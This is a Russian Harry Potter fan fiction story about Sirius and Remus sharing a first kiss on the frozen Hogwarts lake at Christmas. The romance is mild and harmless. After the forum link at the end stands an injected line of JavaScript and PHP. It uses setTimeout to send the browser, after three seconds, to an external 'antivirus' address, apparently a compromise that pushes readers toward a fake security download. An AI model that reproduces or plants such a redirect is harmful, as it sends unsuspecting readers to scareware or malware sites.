В Рождество 

Автор: Тёмная Леди Кэт
Пейринг: Сириус/Ремус
Рейтинг: PG-13
Жанр: слэш, romance
Disclaimer: Все персонажи, идеи и т.д. принадлежат Дж.К. Роулинг.
Размещение: с разрешения автора

Ремус резко отдернул плотную штору и восхищенно уставился в окно. Как же он любил Рождество! Особенно Рождество в Хогвартсе. Родители всегда звали его домой, ведь это семейный праздник, но… Оставаясь в школе, он утешал себя мыслью, что впереди еще будет много-много праздников, которые он сможет провести с родителями. Ведь у него всегда есть дом.

 За окном шел снег. Ночное небо было затянуто тяжелыми, густыми тучами – ни Луны, ни звезд. Но все равно светло – белоснежные снежинки словно светились в темноте, создавая неземное, призрачное сияние. Сегодня все так красиво, так необычно и таинственно, а завтра… Завтра утром будет солнце, будут огромные сугробы, и будут снежки и смех, и мокрые руки и коленки. И не скажешь, что это играют волшебники… Так, обычные магловские дети.

 Ремус улыбнулся сам себе и забрался на окно с ногами, всем телом ощущая холод древнего замка. Все однокурсники разъехались; и теперь в общей спальне остались только он да Сириус Блэк. Похоже, сегодня вообще придется ночевать одному – Сириусу явно понравился тот праздник, что устроил им всем Дамблдор, и Ремус прекрасно знал, что загнать приятеля в кровать в такую ночь – смерти подобно. Опять отправится шалить и проказничать. Бродяга… Что до самого Ремуса, то на этот раз он предпочел тишину и покой. Вот вернутся Джеймс и Питер, и тогда… Перед отъездом Поттер намекнул, что опять что-то придумал, чтобы насолить Снейпу, а такие идеи они всегда поддерживали. Интересно, что будет на этот раз, подумал Люпин, водя пальцем по стеклу.

 Приближается полнолуние. На этот раз компанию ему составит один Сириус, но это ничего, он сильный, если что – оборотня удержит. А самое удивительное то, что бывшее  одним сплошным кошмаром превращение теперь служит проводником в самые счастливые дни, наполненные удивительными новыми открытиями. Теперь Ремус не опасался, что принесет кому-то вред, он даже не думал об этом. Пока рядом друзья, ничего не может случиться. Как хорошо все получилось… Как же здорово…

- Рем! – гаркнули над ухом, да так, что он чуть не свалился с подоконника.

 Сильные руки подхватили его и помогли удержаться на ногах.

- Ну ты чего так перепугался? – рассмеялся Сириус, закладывая руки за спину и покачиваясь на носках туда-сюда. Совсем как ученик, отвечающий заученный урок. – Ой, видел бы ты свое лицо!

- Зачем было так подкрадываться? – выдавил пришедший в себя Ремус, слабо улыбаясь.

- Я не подкрадывался! Просто ты так задумался, что и не заметил, как я вошел, - ответил Сириус и плюхнулся на свою кровать. – А почему ты здесь один сидишь? Я и не заметил, как ты смылся с праздника, эти хлопушки со сливочным пивом… Я до сих пор весь липкий!

- Неудивительно, ты же прикончил половину всех сладостей, что были на столе, - смеясь, заметил Люпин. – Вот уж не думал, что ты такой сладкоежка! И нечего на хлопушки сваливать.

- Что?! – возопил Блэк и швырнул в друга подушкой (Ремус вовремя уклонился). – Ладно-ладно, я тебе это припомню… А ты почему ушел-то?

- Устал просто. Захотелось в тишине побыть, вот и все.

 Он снова подошел к окну и поглядел на небо. Никаких изменений, снег и снег.

- Рем… Ты в порядке?

- Да, конечно…

- Странный ты сегодня, задумчивый. Опять думаешь о полнолунии?

- Нас двое осталось, - как-то невпопад сказал Ремус. – А оно уже скоро…

 Позади послышался шорох – Сириус встал, и спустя несколько мгновений его руки уже легли на плечи друга.

- Прекрати, Рем. Все будет как обычно. Что за меланхолия?

 Ремус только головой покачал.

- Хэй, сегодня надо веселиться, и все такое! А ну пошли!

- Куда?

- Пошли, пошли! На, натягивай мантию!

- Нет, постой… - попытался Ремус, но Сириус не дал ему и слова сказать, чуть ли не силком заставив одеться.

 Они пробежали через общую гостиную, миновали Полную Даму и направились вниз. В общем зале уже никого не было -  профессора и оставшиеся на Рождество студенты разошлись, и здесь было темно и тихо. Сириус молча взял Ремуса за руку и потянул за собой.

- Сириус…

- Ш-ш-ш!

 Ремус вздохнул и положился на благоразумие – а точнее, его отсутствие у Сириуса… И что ему в голову вдарило? Друзья – это хорошо, но когда они занимают слишком большое место в твоей жизни, это иногда досадно, тут уж не посидишь в одиночестве.

 Они прокрались через темный холл, и до Люпина наконец-то дошло, что приятель задумал вытянуть его на мороз! Причем через главный вход! Причем ночью! Конечно, правила затем и существуют, чтобы их нарушать, особенно в праздники, но… Но…

- Но…

- Я хочу тебе кое-что показать, - зашептал Сириус. – Спорим, ты такого еще не видел! Не будь занудой, Лунатик!

- Сириус! Если уж тебе приспичило выйти ночью, то давай лучше воспользуемся Картой! Главный вход освещен!

- Рем, это проще простого, говорю тебе.

 Продолжая шепотом пререкаться, Сириус таки дотащил приятеля до дверей и вытянул в ночь. Было так холодно, что дыхание вырывалось изо рта и носа облачком густого белого пара. Падающий снег в два счета разукрасил их волосы и мантии пушистыми снежинками, так что оба вскоре начали напоминать ходячих снеговиков.

- Вот видишь, а ты бухтел! – победно заключил Сириус, когда они, пробежав немножко, оказались в темноте. – Наверняка все преподы в святой уверенности, что мы видим десятый сон и мечтаем о рождественских подарках! Ха!

 Ремус счел за лучшее промолчать о том, что он вообще-то не прочь посмотреть на свои подарки.

- А куда мы идем? – поинтересовался он, прижимая ладони к лицу и дыша в них. Носу стало немножко теплее.

- К озеру, конечно! Там так здорово! Увидишь.

 Когда они наконец вышли к озеру, Ремус не смог сдержать восхищенного вздоха. Действительно, это было потрясающе – озеро сплошь покрыто льдом, мерцающим под темным небом. Облака разошлись, им на смену пришли мириады маленьких серебряных звезд, посылающих зимние колючие лучи на Землю. Снег поредел; и теперь одинокие снежинки подолгу кружились в сухом холодном воздухе, прежде чем упасть наземь и собраться в сугроб.

 Сириус молча взял Рема за руку и шагнул на лед.

- Есть места, - пояснил он, - где не скользит. А другие как каток.

 Было немножко страшновато думать, что под слоем льда – глубокое озеро, но Ремус быстро забыл об этом, увлеченный невероятной красотой ночи. Волком он ощущал бы ее гораздо острее и яснее, чувства животного гораздо более разнообразны. Он мог даже представить и почувствовать бег на четырех лапах, сокращение мускулов и острый морозный воздух, вливающийся в легкие.

 Сириус молча стоял рядом и смотрел на друга. Ремус запрокинул лицо к звездам и улыбался своей особенной улыбкой, такой, когда он думал о чем-то своем, неизвестном даже его ближайшим друзьям. В этот момент полной отвлеченности от реальности он был еще красивее, чем обычно. И такие необыкновенные, мечтательные глаза… Сириус встряхнулся.

- Эй, Лунатик, чего размечтался? Вот тебе, догоняй! – он зачерпнул пригоршню сухого рассыпчатого снега и сыпанул его на Ремуса. Тот опомнился, издал возмущенный возглас и пнул ногой ближайший сугроб, метя в приятеля, но тот был уже слишком далеко, и в него ничего не попало. Они бегали друг за другом по льду и взметали вокруг себя тучи серебряных снежинок, таявших на руках и лице, неведомо как забиравшихся под одежду и в обувь. Забывшись, они смеялись в голос, и их голоса эхом разносились над ледяным пространством озера.

- Опс! – Сириус одной ногой попал на слишком скользкий участок и навернулся в сугроб головой, Ремус не успел остановиться, споткнулся о друга и упал сверху. Ребята некоторое время могли только лежа хохотать, шутливо брыкаясь, вороша снег и пытаясь разобраться в руках и ногах. Когда им это удалось и смех прошел, они просто молча лежали и смотрели на небо, взявшись за руки. Снег таял между теплыми ладонями, маленькими ручейками стекал на лед, оставляя на нем темные расплывчатые пятнышки…

- Слушай, Рем… интересно, что с нами будет?

- В каком это смысле?

- Ну, кем стану я, ты, Джеймс, Питер… Будем ли мы так же дружить и какие у нас будут дети… Какие жены, наконец!

- А я не хотел бы знать. Я думаю, от этого было бы только хуже… Впрочем, кое-что могу угадать – жену Джеймса я уже знаю, и ты тоже.

- Да-а-а… Повез ее знакомить с родителями, а раньше всегда оставался с нами на Рождество.

- Мы меняемся, Сириус. Взрослеем. Наша четверка распадается – Поттер увлечен своей девушкой, Питер тоже уехал, в последнее время он какой-то сам не свой и молчит, а я и ты…

- А что мы, какими были, такими и остались! – бодро проговорил Сириус и приподнялся на локте, глядя другу в глаза. – Лунатик и Бродяга.

- Да, - улыбнулся Ремус. – Лунатик и Бродяга… Все верно.

С минуту они просто смотрели друг на друга, а потом медленно – очень медленно – Сириус поднял руку и провел ею по лицу Ремуса: прочертил лоб, щеку, подбородок. Дорожка закончилась на его губах, мягкие подушечки пальцев скользнули по линии приоткрывшегося рта, впитывая в себя теплое дыхание. Не глядя, но почти физически ощущая, как темнеют глаза друга, Сириус склонился и поцеловал его. Никакого сопротивления не последовало – но и ответа тоже. Люпин просто лежал, глядя в небо, закинув одну руку за голову и перебирая снег пальцами. Только резко потемневшие глаза выдавали его. Сириус знал – когда темно-зеленый превращается в почти черный – лучше извиниться и уйти. Недаром же Рем оборотень – из тихого и спокойного парня он мог мгновенно превратиться в яростное, бешеное и безрассудное существо. Блэк вздохнул. Так и знал…

- Ремус…

- Не извиняйся, Сириус.

- ???

- Тебе удалось сделать то, на что не мог решиться я, - Люпин перевел потеплевший взгляд на лицо друга и неожиданно мягко улыбнулся, несмотря на то, что его глаза все еще были почти черными.

- Так ты хочешь сказать, что… - все еще не веря, Сириус сел в снегу и прижал пальцы к вискам. – Так ты… Я… Просто в голове не укладывается!

- Да. Признаюсь, сам я боялся сделать первый шаг, не знал, как ты это воспримешь, - чуть смущенно сказал Люпин, тоже садясь и пытаясь найти хоть одно сухое место на мантии, чтобы вытереть мокрые руки. 

  Вместо ответа Сириус повалил его обратно в снег.

- Пора возвращаться, - заметил Рем, когда ему наконец удалось спихнуть с себя совершенно утратившего чувство времени Блэка. Тот недовольно хмыкнул.

- О боги, боги, вот он, ненавистный голос разума!

- Ненавистный? – Люпин чуть приподнял брови.

- Ну, это я в переносном смысле! – быстро поправился Сириус. – Почему ты всегда такой…такой… рациональный?

- Потому что, если застукают, что нас с тобой нет в замке, то из школы мы вылетим со скоростью, близкой к скорости света, - на полном серьезе ответил Ремус. – Поднимайся давай, и пошли обратно.

- Ох, как скажете, сэр! – Сириус поднялся и встряхнулся совсем по-собачьи. Длинные черные волосы упали на лицо, и он откинул их привычным движением, которым всегда так любовался Люпин (впрочем, не только он один).

 Они отошли довольно далеко от озера, когда Сириус снова обнял друга и нашел в полутьме его губы. Ремус отчего-то рассмеялся прямо ему в рот, и Блэк в замешательстве посмотрел на него.

- Что тут смешного? Я что-то не так делаю?

- Нет, нет! – замахал одной рукой Люпин, другой обнимая Сириуса за плечи и утыкаясь ему в плечо. Послышалось приглушенное хихиканье. – Я просто…просто… ну, подумал, как это со стороны смотрится – когда двое парней целуются, - новый приступ смеха. – Должно быть, это так глупо выглядит!

- Дурак ты, - буркнул Сириус, тем не менее улыбаясь. – Какая разница, если мы с тобой…

- Идем же, - перебил его Люпин, резко успокаиваясь и отстраняясь. – Я хочу надеть на себя что-нибудь сухое.

 Они успешно добрались до своей башни – по пути завернув на кухню и прихватив там традиционный тыквенный сок и пирожные. Домашние эльфы были рады-радешеньки снабдить двух вечно голодных мальчишек едой, а также предложили свою помощь в стирке и сушке одежды, за что Ремус был весьма благодарен милым нелепым созданиям.

 Прокравшись в спальню их курса, они разложили трофеи на прикроватной тумбочке Люпина и принялись подкрепляться. Сириус не выказывал ни малейших признаков усталости – он был так же бодр и жизнерадостен, как и в начале вечера, а Ремус чувствовал, что еще пара минут – и он заснет. В глаза словно насыпали песка, голова стала тяжелой и мысли медленно-медленно ворочались в ней, никак не желая думаться. Он и не заметил, как широко зевнул во весь рот.

- Блэк, я спать хочу, - пробормотал Люпин, отставляя стакан с соком и откидываясь на подушку. – Я больше не могу сидеть, извини.

- Да ничего, - Сириус подошел, сел рядом и задернул полог. – А можно я с тобой полежу?

- Зачем?

- Ну как… просто.

- Надеюсь, ты не будешь ничего такого делать, - пробормотал Рем, поворачиваясь на бок и натягивая на себя одеяло.

- За кого ты меня принимаешь? – возмущенно фыркнул Блэк, но его друг уже спал и ничего не слышал. Тогда Сириус тоже положил голову на подушку, ощущая под рукой теплый ком завернутого в одеяло Люпина. Мерное дыхание убаюкивало, и вскоре Сириус тоже погрузился в сладкие объятия сновидений.

 После рождественских каникул в школе вновь воцарились привычные порядки. Все ученики, бывшие в отъезде на праздники, вернулись. Джеймс и Лили были невероятно, безумно счастливы. Питер, глядя на них, мягко улыбался, отчего на его пухлых щеках явно проступали розовые ямочки. Блэк и Люпин, приятельствуя со всеми, никого не пускали в свой узкий круг. Кто бы ни смотрел на эту компанию, сразу понимал – нет больше той известной по всей школе команды друзей, что ввязывалась во все переделки и участвовала во всех приключениях.

 И только по ночам в полнолуние четверка неразлучных друзей выходила в темноту, чтобы едва заметными тенями во мраке нестись неведомо куда, к одним им известной далекой цели.

 Сириус и Ремус всегда шли рядом. Но они никогда не держались за руки.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>